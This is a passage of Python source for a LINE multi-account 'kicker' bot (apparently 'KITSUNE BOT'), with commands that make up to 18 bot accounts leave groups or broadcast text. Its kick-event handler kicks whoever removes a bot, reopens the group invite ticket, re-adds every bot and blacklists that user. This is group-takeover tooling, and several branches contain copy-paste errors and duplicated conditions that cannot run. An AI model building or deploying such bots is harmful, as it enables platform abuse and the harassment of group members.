# ki6.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "Bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B6 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki6.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B7 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki7.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B8 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki8.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B9 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki9.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B10 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B11 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki11.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B12 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B13 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki13.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B14 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki14.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B15 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki15.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B16 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki16.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B17 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki17.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "B18 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki18.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
# elif msg.text in ["Translate"]:
# cl.sendText(msg.to,"""★[TRANSLATE]★\Tr-id ☆to indonesia☆\Tr-en ☆to english☆\Tr-jap ☆to japan☆\Tr-thai ☆to thailand☆\n_______________"""
#""")
# ki2.sendText(msg.to,""" KITSUNE BOT [KB] ���� \n\n key Only Kicker \n\n[Kb2 in]\n[2Aditname:]\n??[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb2 Gift]\n[Kb2 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki3.sendText(msg.to,""" KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb3 in]\n[3Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb3 Gift]\n[Kb3 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki4.sendText(msg.to,""" KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb4 in]\n[4Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb4 Gift]\n[Kb4 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki5.sendText(msg.to,""" �� KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb5 in]\n[5Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb5 Gift]\n����[Kb5 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki6.sendText(msg.to,""" KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb6 in]\n[6Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb6 Gift]\n[Kb6 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
#-----------------------------------------------
elif msg.text in ["Welcome","wc","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
elif "Say " in msg.text:
bctxt = msg.text.replace("Say ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
# ki3.sendText(msg.to,(bctxt))
# ki4.sendText(msg.to,(bctxt))
# ki5.sendText(msg.to,(bctxt))
# ki6.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
ki.sendText(msg.to,"Ping ")
ki2.sendText(msg.to,"Ping ")
# ki3.sendText(msg.to,"Ping ")
# ki4.sendText(msg.to,"Ping ")
# ki5.sendText(msg.to,"Ping ")
# ki6.sendText(msg.to,"Ping ")
#-----------------------------------------------
#-----------------------------------------------
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki2.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = cl.getGroup(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki2mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki2mid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = cl.getGroup(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki6mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki8mid:
if op.param2 in ki7mid:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
else:
G = ki7.getGroup(op.param1)
ki7.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki7mid:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(G)
else:
G = ki8.getGroup(op.param1)
ki8.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki9mid:
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki10.updateGroup(G)
else:
G = ki10.getGroup(op.param1)
ki10.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
